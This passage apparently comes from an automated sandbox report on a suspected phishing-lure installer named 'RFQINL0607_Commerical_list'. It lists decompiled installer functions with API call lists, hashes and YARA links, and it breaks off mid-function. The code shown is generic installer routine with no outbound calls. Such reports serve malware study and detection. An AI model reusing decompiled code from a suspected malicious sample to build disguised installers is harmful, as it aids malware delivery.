                                                                                                                                                                                  • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                                  			E100023DA(intOrPtr* _a4) {
				char _v80;
				intOrPtr _v84;
				short _v92;
				intOrPtr* _t22;
				void* _t24;
				intOrPtr _t25;
				signed int _t33;
				void* _t37;
				intOrPtr _t38;
				void* _t41;

				_t37 = E10001215();
				_t22 = _a4;
				_t38 =  *((intOrPtr*)(_t22 + 0x814));
				_v84 = _t38;
				_t41 = (_t38 + 0x41 << 5) + _t22;
				do {
					if( *((intOrPtr*)(_t41 - 4)) != 0xffffffff) {
					}
					_t33 =  *(_t41 - 8);
					if(_t33 <= 7) {
						switch( *((intOrPtr*)(_t33 * 4 +  &M100024FD))) {
							case 0:
								 *_t37 = 0;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x1000405c);
								goto L15;
							case 4:
								__ecx =  *0x1000405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x1000405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L15;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push( &_v80);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x1000405c, __ebx, __ebx);
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfA(__edi, 0x10004000);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t24 =  *(_t41 + 0x14);
					if(_t24 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t41 - 4)) > 0)) {
						GlobalFree(_t24);
					}
					_t25 =  *((intOrPtr*)(_t41 + 0xc));
					if(_t25 != 0) {
						if(_t25 != 0xffffffff) {
							if(_t25 > 0) {
								E100012D1(_t25 - 1, _t37);
								goto L24;
							}
						} else {
							E10001266(_t37);
							L24:
						}
					}
					_v84 = _v84 - 1;
					_t41 = _t41 - 0x20;
				} while (_v84 >= 0);
				return GlobalFree(_t37);
			}













                                                                                                                                                                                  0x100023e6
                                                                                                                                                                                  0x100023e8
                                                                                                                                                                                  0x100023f2
                                                                                                                                                                                  0x100023f8
                                                                                                                                                                                  0x10002402
                                                                                                                                                                                  0x10002406
                                                                                                                                                                                  0x1000240a
                                                                                                                                                                                  0x1000240a
                                                                                                                                                                                  0x10002412
                                                                                                                                                                                  0x10002418
                                                                                                                                                                                  0x1000241e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10002425
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10002429
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10002433
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10002443
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x1000246f
                                                                                                                                                                                  0x10002477
                                                                                                                                                                                  0x10002481
                                                                                                                                                                                  0x10002483
                                                                                                                                                                                  0x10002488
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x1000244b
                                                                                                                                                                                  0x1000244f
                                                                                                                                                                                  0x10002451
                                                                                                                                                                                  0x10002452
                                                                                                                                                                                  0x10002454
                                                                                                                                                                                  0x10002464
                                                                                                                                                                                  0x1000246b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x1000248e
                                                                                                                                                                                  0x10002490
                                                                                                                                                                                  0x10002496
                                                                                                                                                                                  0x1000249c
                                                                                                                                                                                  0x1000249c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x1000241e
                                                                                                                                                                                  0x1000249f
                                                                                                                                                                                  0x1000249f
                                                                                                                                                                                  0x100024a4
                                                                                                                                                                                  0x100024b5
                                                                                                                                                                                  0x100024b5
                                                                                                                                                                                  0x100024bb
                                                                                                                                                                                  0x100024c0
                                                                                                                                                                                  0x100024c5
                                                                                                                                                                                  0x100024d1
                                                                                                                                                                                  0x100024d6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x100024db
                                                                                                                                                                                  0x100024c7
                                                                                                                                                                                  0x100024c8
                                                                                                                                                                                  0x100024dc
                                                                                                                                                                                  0x100024dc
                                                                                                                                                                                  0x100024c5
                                                                                                                                                                                  0x100024dd
                                                                                                                                                                                  0x100024e1
                                                                                                                                                                                  0x100024e4
                                                                                                                                                                                  0x100024fc

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11531499304.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11531472460.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11531531886.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11531564017.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1780285237-0
                                                                                                                                                                                  • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                                                                                                  • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                                                                                                  • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00404813 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00404813(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                                                                                  0x00404821
                                                                                                                                                                                  0x0040482e
                                                                                                                                                                                  0x00404834
                                                                                                                                                                                  0x00404872
                                                                                                                                                                                  0x00404872
                                                                                                                                                                                  0x00404881
                                                                                                                                                                                  0x00404888
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040488a
                                                                                                                                                                                  0x00404836
                                                                                                                                                                                  0x00404845
                                                                                                                                                                                  0x0040484d
                                                                                                                                                                                  0x00404850
                                                                                                                                                                                  0x00404862
                                                                                                                                                                                  0x00404868
                                                                                                                                                                                  0x0040486f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040486f
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                                                                                                                                                  • GetMessagePos.USER32 ref: 00404836
                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404850
                                                                                                                                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                                                                                                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                                                                  • String ID: f
                                                                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                                                                  • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                                                                                                  • Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
                                                                                                                                                                                  • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                                                                                                  • Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00402B7F(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, "true", 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414418; // 0xa9d5e
					_t11 =  *0x420424; // 0xa9f62
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                                                                                                  0x00402b8c
                                                                                                                                                                                  0x00402b9a
                                                                                                                                                                                  0x00402ba0
                                                                                                                                                                                  0x00402ba0
                                                                                                                                                                                  0x00402bae
                                                                                                                                                                                  0x00402bb0
                                                                                                                                                                                  0x00402bb6
                                                                                                                                                                                  0x00402bbd
                                                                                                                                                                                  0x00402bbf
                                                                                                                                                                                  0x00402bbf
                                                                                                                                                                                  0x00402bd5
                                                                                                                                                                                  0x00402be5
                                                                                                                                                                                  0x00402bf7
                                                                                                                                                                                  0x00402bf7
                                                                                                                                                                                  0x00402bff

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402B9A
                                                                                                                                                                                  • MulDiv.KERNEL32(000A9D5E,00000064,000A9F62), ref: 00402BC5
                                                                                                                                                                                  • wsprintfA.USER32 ref: 00402BD5
                                                                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                                                                                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • verifying installer: %d%%, xrefs: 00402BCF
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                                                                  • Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                                                                                                                                  • Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
                                                                                                                                                                                  • Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                                                                                                                                  • Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00401D38 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                                  			E00401D38() {
				void* __esi;
				int _t7;
				signed char _t13;
				struct HFONT__* _t16;
				void* _t20;
				struct HDC__* _t26;
				void* _t28;
				void* _t30;

				_t26 = GetDC( *(_t30 - 8));
				_t7 = GetDeviceCaps(_t26, 0x5a);
				0x40a818->lfHeight =  ~(MulDiv(E00402A1D(2), _t7, 0x48));
				ReleaseDC( *(_t30 - 8), _t26);
				 *0x40a828 = E00402A1D(3);
				_t13 =  *((intOrPtr*)(_t30 - 0x18));
				 *0x40a82f = 1;
				 *0x40a82c = _t13 & 0x00000001;
				 *0x40a82d = _t13 & 0x00000002;
				 *0x40a82e = _t13 & 0x00000004;
				E00405D51(_t20, _t26, _t28, "Times New Roman",  *((intOrPtr*)(_t30 - 0x24)));
				_t16 = CreateFontIndirectA(0x40a818);
				_push(_t16);
				_push(_t28);
				E00405C8D();
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                                                                                                                  0x00401d41
                                                                                                                                                                                  0x00401d48
                                                                                                                                                                                  0x00401d63
                                                                                                                                                                                  0x00401d68
                                                                                                                                                                                  0x00401d75
                                                                                                                                                                                  0x00401d7a
                                                                                                                                                                                  0x00401d85
                                                                                                                                                                                  0x00401d8c
                                                                                                                                                                                  0x00401d9e
                                                                                                                                                                                  0x00401da4
                                                                                                                                                                                  0x00401da9
                                                                                                                                                                                  0x00401db3
                                                                                                                                                                                  0x00402513
                                                                                                                                                                                  0x00401561
                                                                                                                                                                                  0x00402877
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x004028de

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDC.USER32(?), ref: 00401D3B
                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                                                                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                                                                                                                  • CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                  • String ID: Times New Roman
                                                                                                                                                                                  • API String ID: 3808545654-927190056
                                                                                                                                                                                  • Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                                                                                                                                  • Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
                                                                                                                                                                                  • Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                                                                                                                                  • Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                                  			E004026C6(int __ebx) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402A3A(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E0040580E(_t50) == 0) {
					E00402A3A(0xffffffed);
				}
				E0040597D(_t50);
				_t26 = E004059A2(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42e414;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E004030C7(_t45);
						E004030B1(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x34) = _t54;
						if(_t54 != _t45) {
							E00402E9F( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x50) =  *_t54;
								E0040595D( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x50);
							}
							GlobalFree( *(_t56 - 0x34));
						}
						E00405A49( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E00402E9F(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                                                                                                                                                  0x004026c6
                                                                                                                                                                                  0x004026c8
                                                                                                                                                                                  0x004026d4
                                                                                                                                                                                  0x004026d7
                                                                                                                                                                                  0x004026e1
                                                                                                                                                                                  0x004026e5
                                                                                                                                                                                  0x004026e5
                                                                                                                                                                                  0x004026eb
                                                                                                                                                                                  0x004026f8
                                                                                                                                                                                  0x00402700
                                                                                                                                                                                  0x00402703
                                                                                                                                                                                  0x00402709
                                                                                                                                                                                  0x00402717
                                                                                                                                                                                  0x0040271c
                                                                                                                                                                                  0x00402720
                                                                                                                                                                                  0x00402723
                                                                                                                                                                                  0x0040272c
                                                                                                                                                                                  0x00402738
                                                                                                                                                                                  0x0040273c
                                                                                                                                                                                  0x0040273f
                                                                                                                                                                                  0x00402749
                                                                                                                                                                                  0x00402768
                                                                                                                                                                                  0x00402750
                                                                                                                                                                                  0x00402755
                                                                                                                                                                                  0x0040275d
                                                                                                                                                                                  0x00402760
                                                                                                                                                                                  0x00402765
                                                                                                                                                                                  0x00402765
                                                                                                                                                                                  0x0040276f
                                                                                                                                                                                  0x0040276f
                                                                                                                                                                                  0x0040277c
                                                                                                                                                                                  0x00402782
                                                                                                                                                                                  0x00402794
                                                                                                                                                                                  0x00402794
                                                                                                                                                                                  0x0040279a
                                                                                                                                                                                  0x0040279a
                                                                                                                                                                                  0x004027a5
                                                                                                                                                                                  0x004027a6
                                                                                                                                                                                  0x004027aa
                                                                                                                                                                                  0x004027ae
                                                                                                                                                                                  0x004027b4
                                                                                                                                                                                  0x004027b4
                                                                                                                                                                                  0x004027bb
                                                                                                                                                                                  0x004021c4
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x004028de

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                                                                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2667972263-0
                                                                                                                                                                                  • Opcode ID: 3c90496125715a97820d0f0feb4620caae7b198adb4e162d08689b738c93d2aa
                                                                                                                                                                                  • Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c90496125715a97820d0f0feb4620caae7b198adb4e162d08689b738c93d2aa
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00404709 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                                  			E00404709(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
